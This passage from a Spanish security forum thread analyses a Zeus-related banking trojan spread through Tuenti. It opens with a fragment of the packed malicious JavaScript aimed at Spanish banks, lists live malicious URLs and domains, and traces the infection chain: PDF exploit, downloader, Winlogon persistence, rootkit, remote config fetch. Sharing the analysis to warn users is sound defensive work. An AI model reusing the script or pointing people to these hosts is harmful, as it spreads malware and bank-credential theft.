ffd9867818936e010a7ad5b3b83566bb5be1ccd3629436366df770fa0fde2eb168caa09e1edecf5fc18ecac9c461543257cf9e5a61e3053c54523f54ce74ab21edc9529ffe11a4a828b05862dc8a4e789f67a9c58b767c56f92179245aaf9b9fddfbd10bd3489e7803d214e8528419cebbd7764417ecfc71c9f23fad505723883d9a59bade136384edbebb8a95b8255f6646d4d9b2059f48b164f012ba8605c7df6a7e30a796169b20f84f5cc3b64095a2f56ea9ae9f82861a838d71f3d0a44ba3d5c3f619e2b629c5eb6310690263a5d21c69053f07624101b1993b564aeb56535989d0595b51cfb3fcd796bf5a1f41fc10098e17f38a69d7878d9395629e575b069d5b6ddb5899d059e2f1a421d59dd2df66347d6bfb7df0be54238a16902cea915bd5b7cc5020ea62c7c49d7924ff2d1ed6f7061e305418da6|412158e80c145036dc166fd9ac7e6409c192654973ff19c3623d191892659a54a77ad9aeba7c533b3c57ec9855002899ed|4b2b0dac07135072950c748ba674650fdac0241c29b35fc96a271919d768945fb43ed4a5fb3c166b304be19e125f0bb3818f05a89ce3|4b6945a94215123b92167296ad65791e93c76a0867b110c5772c0e13d362941bb17b90f4fb785968365be19215434b00c72f27|79225cbd0b1d5020dc0665d9aa787f0fdbd70002172d|3e6901fb577b235efa6e0af2eb191a6bb7bb286256d27dbd01496f36bd10e000825d78|125b2ddf66603958f704270a80|4d1b789d372460070177abbf|194e3bd96e7a3143f0680b027a1b66|3e7f099c3700237038|4d19789c35266706a13105f50d90|0e443ddf647103e75d93|125b2ddf66603958f700deafda|4d19789d372464070002cc68|0d036f542a|376901fb53663159ea5317fddf381067a3f90b7f520578d616|0d03bdb3ba|0e443ddf6471002d6a90|194e3bd96e7a3143f0680b048aced1|default|line|es_ES|30000|formulari|w_|constants_|CJZLOGTR___|en_UK|js|comision|Event|MOUSEDOWN|captureEvents|cancelBubble|button|importecomision|gastoSwift|100000000|ceil|1000000000|llamar|activ|call|JBIVTransTrasMenu|incorrect|GeneralShowMessage|CJZLOGIN___|des|nombre|60000|mit|400|600|02000024|02000022|02000300|disponible|20000|switch|_CB|limit|path|undefined|toGMTString|escape|expires|unescape|visibility|Msxml2|JBIVTrpConsultaOperacionesCaixaBEE|iframe|width|head|Expires|history|CBIVUtilConsultarUltimasOperacionesR|forward|_B2|setMonth|setDate|2012|bloque|2001|1_src|nombreord|event|contentWindow|Microsoft|srcElement|1_onload'.split('|'),0,{}))

</script>



data_end



data_after

data_end





;###################################################

Por lo que se puede ver su objetivo son datos de bancos españoles.

También han subido un par de exploits para Internet Explorer en:

Código:
http://onlinegames25.net/fs/its/

A ver si alguien con más conocimientos que yo le echa un vistazo a todo ésto y nos comenta algo de esos archivos :)

Un saludo!
« Última modificación: 30 Enero 2010, 22:06 por Novlucker » En línea
Novlucker
Ninja y
Moderador Global
*****
Desconectado Desconectado

Mensajes: 8.267


Yo que tu lo pienso dos veces


Ver Perfil
Re: [Aviso] Los hackers rusos descubren tuenti
« Respuesta #1 en: 28 Enero 2010, 12:51 »
Al intentar ingresar a la URL que indicas, al menos Avast alerta al respecto


IE8 también me ha notificado, google no dice nada ¬¬ :http://www.google.com/safebrowsing/diagnostic?site=onlinegames25.net
El reporte de Norton Safe Web ya nos adelanta mucho de lo que nos podemos encontrar :D
:http://safeweb.norton.com/report/show?name=onlinegames25.net

Al ingresar a la web se descarga el pdf del que hablas (me enctantan los servicios que se pueden encontrar en la red :D)
:http://wepawet.iseclab.org/view.php?hash=c7eba9f19319bf5c85add5c7f8f43b07&type=js

Como puede verse en el análisis, el mismo se conecta a su servidor e intenta descargar un ejecutable.
Esta misma web nos da análisis de anubis y virustotal. El primero reporta un archivo de nombre sdra64.exe, y el segundo indica que 0/40 AV lo han detectado como peligroso.
De cualquier manera, una búsqueda posterior por MD5 del archivo (el que ellos reportan en el informe), muestra que en realidad son 11/40 AV los que detectan al "bicho", además de aparecer con el nombre de crypt_bot.exe, nombre por el cual he encontrado una sola referencia, de hace más de un año, y en ruso.
:http://www.virustotal.com/analisis/24cd0d3791b50888d4ade8c03b1a49f844a7aaf1d4277ee2201de57335902552-1263737156

En este foro hay una referencia a ese archivo sdra64.exe
http://foro.elhacker.net/seguridad/algo_raro_en_mi_pc-t280264.0.html

Siguiendo con esto, en mi caso se me ha descargado un archivo de nombre load.php, el cual al ser renombrado a exe intenta falsear la apariencia del programa KeePass , y virustotal reporta un total de 10/40 AV en la detección.
:http://www.virustotal.com/es/analisis/366936f79f3535e096538a872caf5184e4180ef3f7de784b4f31eff34e2f4e06-1264640546

En la imagen hay una muestra del archivo falso, el original, y el pdf que se me bajó en un principio


Como puede verse el archivo falso pesa menos, lo cual puede ser debido a que lo he comparado con una versión en teoría anterior (la versión 2.0.7.0 es una beta XD), pero creería que de ser la misma versión igual no coincidirían.

Al ejecutar el archivo "load", este se copia a C:\WINDOWS\System32\sdra64.exe (el peso del ejecutable es mayor), y lo agrega a la llave de inicio de WINLOGON, junto al userinit.exe.
HKLM\software\microsoft\windows nt\currentversion\winlogon

Una cosa a tener presente, es que este ejecutable tiene un componente rootkit, así que si configuramos un análisis en el booteo lo podemos detectar, pero luego de iniciado el sistema no hay manera de dar con el, no podremos verlo ni por el explorador, ni por ms-dos ni nada. Incluso si intentamos cambiar sus atributos se nos indica que el archivo no existe, y por más que modifiquemos la llave de registro en cuestión, esta vuelve a modificarse incluyendo el archivo en cuestión.
No obstante, si miramos el sistema con gmer si lo encontraremos, y en un lindo color rojo ;D , junto a este tendremos además un archivo sdram64.exe:Zone.Identifier, archivo que identifica el nivel de seguridad asignado al archivo, en este caso nivel 3
:http://support.microsoft.com/kb/182569

Además, se conecta a un servidor remoto de donde descarga un archivo cfg.bin (track.bin), perteneciente al conocido Zeus
Este dominio se encuentra ya identificado:
:http://www.siteadvisor.be/sites/base7711.com
:http://www.malwaredomainlist.com/mdl.php?search=base7711.com&colsearch=All&quantity=50

En base al primer reporte de NSW, se supone este archivo load debería de ser un rogue, pero al menos a mi no me ha querido mostrar su verdadera cara

Agregar además que también se crea una carpeta en C:\WINDOWS\System32\lowsec, donde se alojan los archivos local.ds, y user.ds, archivos binarios donde se almacena la información robada

Bueno, creo que eso sería todo, resumiendo la historia sería más o menos así.

  • Ingresamos a la web y se nos descarga pdf
  • El pdf descarga un ejecutable
  • El ejecutable descarga un archivo de configuración de Zeus
Lo demás creo que ya todos lo sabemos :P
Casi me olvido, he "desempaquetado" los scripts que vienen en el archivo que esta dentro del rar, y tienen funciones referentes a las diferentes entidades bancarias, son para hacer el trabajo "sucio" de este "bicho"

Y por último, lo referente a los dos ‭‬‭‬‭‬‭‬‭‬‭‬javascript que se encuentran en el directorio que comentas;

  • IE.js: utiliza objetos propios de vbs y js para descargar y ejecutar un archivo en los temporales (el método es MUY detectado por los AV)
  • IE2.js: crea una imagen en el documento html (document.createelement("img")), 500 veces

Saludos
« Última modificación: 29 Enero 2010, 00:29 por Novlucker » En línea
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
rockernault

Desconectado Desconectado

Mensajes: 2.030


Linux User!!!


Ver Perfil
Re: [Aviso] Los hackers rusos descubren tuenti
« Respuesta #2 en: 28 Enero 2010, 12:56 »
a eso se le llama destripar a algo/alguien!!!!
En línea



Arcano.

Desconectado Desconectado

Mensajes: 261



Ver Perfil
Re: [Aviso] Los hackers rusos descubren tuenti
« Respuesta #3 en: 28 Enero 2010, 16:12 »
 ;-)  ;-)  ;-)

Bravo por ti Novlucker!!

Como dice Rockernault, buen destripe....

Curioso que descargue 'sdra64'. Este bicho ronda hace cosa de dos semanas en la empresa que trabajo...

Mmmm... Habrá que revisar si los usuarios rondan mucho por Tuenti...  :¬¬

Pensaba que sdra64 estaba controlado hace tiempo, pero por lo que comentas "
Citar
... el segundo indica que 0/40 AV lo han detectado como peligroso."
Supongo que habrá tropocientas variantes 'del amigo'.

En fin, lo dicho, da gusto leer a alguien que lo explica fácil y claro...

Saludos.
En línea
La curiosidad es la antesala al conocimiento...
Roy-Mustang

Desconectado Desconectado

Mensajes: 369


Conocido Antes Como Hades-sama


Ver Perfil WWW
Re: [Aviso] Los hackers rusos descubren tuenti
« Respuesta #4 en: 28 Enero 2010, 16:25 »
Novlucker
Moderador Global

Eres un genio  ;D ;D

Saludos
En línea

Novlucker
Ninja y
Moderador Global
*****
Desconectado Desconectado

Mensajes: 8.267


Yo que tu lo pienso dos veces


Ver Perfil
Re: [Aviso] Los hackers rusos descubren tuenti
« Respuesta #5 en: 28 Enero 2010, 17:05 »
Gracias!, pero ya ven que hay cosas que facilitan mucho estas tareas, y no lo "destripe" tanto, otros usuarios lo hubieran "acorralado" en el Olly ;D

Arcano2506, como bien dices, si bien en el segundo análisis que dejo es un poco más detectado, que solo el 25% de los AV lo indentifiquen es llamativo :-\

Por otra parte, justamente me había faltado dejar un método de desinfectarse (ya que estaba), pero tu lo has complementado con lo anterior :D

Saludos
« Última modificación: 28 Enero 2010, 17:27 por Novlucker » En línea
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Arcano.

Desconectado Desconectado

Mensajes: 261



Ver Perfil
Re: [Aviso] Los hackers rusos descubren tuenti
« Respuesta #6 en: 28 Enero 2010, 17:51 »
Buenas Novlucker!

Por cierto, ya que estamos... Debería hablar con algún moderador  :silbar: para comentarle si existe algún otro 'Arcano'. En su momento no me dejó crear la cuenta, pero veo que no hay ningún otro -creo...-.. Vamos, que me gustaría quitar 'lo de 2506'... Pero bueno, eso es otra historia...

En cuanto al 25%... Sí, tienes razón, había leído demasiado rápido el post y me había quedado con el 0%... De igual forma, un 25% me sigue pareciendo poco... No hace mucho pillé una muestra 'de por ahí'. La analizaré, a ver qué veo...

De todas formas, si tú te has topado con él, podrías indicar lo que has visto y cómo lo has eliminado utilizando GMER.

Yo, por ahora, lo elimino mediante MalwareBytes, pero como modifica la clave de Winlogon, valor UserInit añadiendo una ruta de más, incluso en modo seguro cuesta eliminarlo... Vamos, lo que se explica en el link que he dejado antes.

Si puedes, lo dicho:
Citar
...justamente me había faltado dejar un método de desinfectarse (ya que estaba), pero tu lo has complementado con lo anterior

Nada, nada... Yo no he completado nada... Prefiero ver 'tus pasos'  :D

Saludos!!
En línea
La curiosidad es la antesala al conocimiento...
Novlucker
Ninja y
Moderador Global
*****
Desconectado Desconectado

Mensajes: 8.267


Yo que tu lo pienso dos veces


Ver Perfil
Re: [Aviso] Los hackers rusos descubren tuenti
« Respuesta #7 en: 28 Enero 2010, 18:05 »
Con respecto a lo de hablar con algún moderador, me he encontrado a uno que dice que; incluyendote hay unos 5 Arcano con números, y un sexto "Arcano" a secas, el cual no ingresa desde diciembre del 2004 y solo estuvo activo 4 días XD
Igual si vas a aquí, en "Nombre" puedes poner lo que quieras que los demás vean como tu usuario, seguirás usando el arcano2506 para logarte, pero los demás verían solo lo que hayas puesto ;)
Volviendo al tema, en cuanto pueda lo vuelvo a revisar, pero esta vez para mostrar los pasos de desinfección (lo más sencillo posible) ;)

Saludos
En línea
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Arcano.

Desconectado Desconectado

Mensajes: 261



Ver Perfil
Re: [Aviso] Los hackers rusos descubren tuenti
« Respuesta #8 en: 28 Enero 2010, 19:54 »
Citar
..en cuanto pueda lo vuelvo a revisar, pero esta vez para mostrar los pasos de desinfección (lo más sencillo posible)

De sencillo nada, el análisis exhaustivo y completito...  :P

Hale, ya nos contarás!
En línea
La curiosidad es la antesala al conocimiento...
nacho87
Usuario

Desconectado Desconectado

Mensajes: 71


Ver Perfil WWW
Re: [Aviso] Los hackers rusos descubren tuenti
« Respuesta #9 en: 29 Enero 2010, 00:45 »
Gracias por el destripe! tenía ganas de ver lo que hacía realmente. Lo que aún no se es cómo me llegaron esos mensajes por el tuenti.

Un saludo!
En línea
Lord R.N.A.

Conectado Conectado

Mensajes: 886


Quiero ser tan troll como SDC...


Ver Perfil WWW
Re: [Aviso] Los hackers rusos descubren tuenti
« Respuesta #10 en: 29 Enero 2010, 01:36 »
Tengo una duda... que tienen de diferente los hackers rusos de otros hackers...
En línea
Littlehorse

Desconectado Desconectado

Mensajes: 1.957


Nie Dam Sie


Ver Perfil WWW
Re: [Aviso] Los hackers rusos descubren tuenti
« Respuesta #11 en: 29 Enero 2010, 08:53 »
Cita de: R.N.A. en 29 Enero 2010, 01:36
Tengo una duda... que tienen de diferente los hackers rusos de otros hackers...

Que los rusos están entre los mejores del mundo. Las redes de cyber-crimen mas importantes del mundo están por esos lares y ni hablar de la carrera que hace rato encabeza Rusia en cuanto a cyber-guerra. Podes encontrar otros focos igual o mas importantes en China, Israel, Estados Unidos etc.

Un saludo
En línea
An expert is a man who has made all the mistakes that can be made in a very narrow field
Novlucker
Ninja y
Moderador Global
*****
Desconectado Desconectado

Mensajes: 8.267


Yo que tu lo pienso dos veces


Ver Perfil
Re: [Aviso] Los hackers rusos descubren tuenti
« Respuesta #12 en: 29 Enero 2010, 15:20 »
Cita de: nacho87 en 29 Enero 2010, 00:45
Gracias por el destripe! tenía ganas de ver lo que hacía realmente. Lo que aún no se es cómo me llegaron esos mensajes por el tuenti.

Un saludo!

Ya me preguntaba yo como era que ayer las visitas al post aumentaban relativamente rápido (si bien hay post que lo han hecho más rápido), y es que lo has colgado en meneame y tuentiadictos, y luego de eso ha ido a parar a algún blog/web más :xD

Saludos
En línea
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
nacho87
Usuario

Desconectado Desconectado

Mensajes: 71


Ver Perfil WWW
Re: [Aviso] Los hackers rusos descubren tuenti
« Respuesta #13 en: 29 Enero 2010, 19:00 »
Cita de: Novlucker en 29 Enero 2010, 15:20
Cita de: nacho87 en 29 Enero 2010, 00:45
Gracias por el destripe! tenía ganas de ver lo que hacía realmente. Lo que aún no se es cómo me llegaron esos mensajes por el tuenti.

Un saludo!

Ya me preguntaba yo como era que ayer las visitas al post aumentaban relativamente rápido (si bien hay post que lo han hecho más rápido), y es que lo has colgado en meneame y tuentiadictos, y luego de eso ha ido a parar a algún blog/web más :xD

Saludos


jejeje, a meneame la envie yo, de tuentiadictos es la primera ver que lo oigo o.0
Mejor que la gente esté prevenida que luego hay disgustos.jeje.

Un saludo!
En línea
Novlucker
Ninja y
Moderador Global
*****
Desconectado Desconectado

Mensajes: 8.267


Yo que tu lo pienso dos veces


Ver Perfil
Re: [Aviso] Los hackers rusos descubren tuenti
« Respuesta #14 en: 30 Enero 2010, 20:52 »
Bueno, en mensajes anteriores nacho87 había dejado en "plano" el código del exploit que es utilizado en el pdf, razón por la cual algunos AV como Avast alertaban al ingresar al post, así que como ha sido reportado por varias personas, el mensaje en cuestión ha sido eliminado.

De cualquier manera, arriba donde explico rapidamente que es lo que ocurre al ingresar a la web, el link que apunta a wepawet.iseclab.org tiene practicamente el mismo contenido que se ha eliminado, solo que ya no saltara el AV en este post ;D
Como seguía siendo detectado el primer código de todos, ahora esta en mediafire

Saludos
« Última modificación: 30 Enero 2010, 22:07 por Novlucker » En línea
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Páginas: [1] 2 3 Ir Arriba Imprimir 
Ir a:  





Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Yashira.org    Videojuegos    indetectables.net    Seguridad Informatica Colombia    Indejuegos    Internet móvil    Juegos de Mario

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec    Seguridad Wireless    Underground México    Biblioteca de Seguridad

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC